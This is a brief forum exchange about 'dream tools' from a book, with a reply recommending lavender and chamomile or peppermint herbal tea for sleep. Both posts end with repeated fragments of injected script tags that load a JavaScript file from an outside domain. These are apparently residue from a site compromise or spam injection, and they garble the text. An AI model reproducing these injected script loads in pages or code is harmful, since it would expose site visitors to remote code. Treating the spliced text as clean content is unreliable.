Hello everyone. I have a questions regarding dream tools.

Se a while ago I had gotten a book about dreams and they had mentioned dream tools. They not only mentioned what they are used for, but how to make them as well. I was wondering if anyone here used them. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Lavender works for a peaceful sleep. Chamomile/peppermint tea is good to relax you before bedtime. I would try those. And I'm not talking regular tea. Its herbal tea that contains the herbs and flowers. It really tastes good. You can sweeten with honey, if you prefer a sweet taste. BB sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
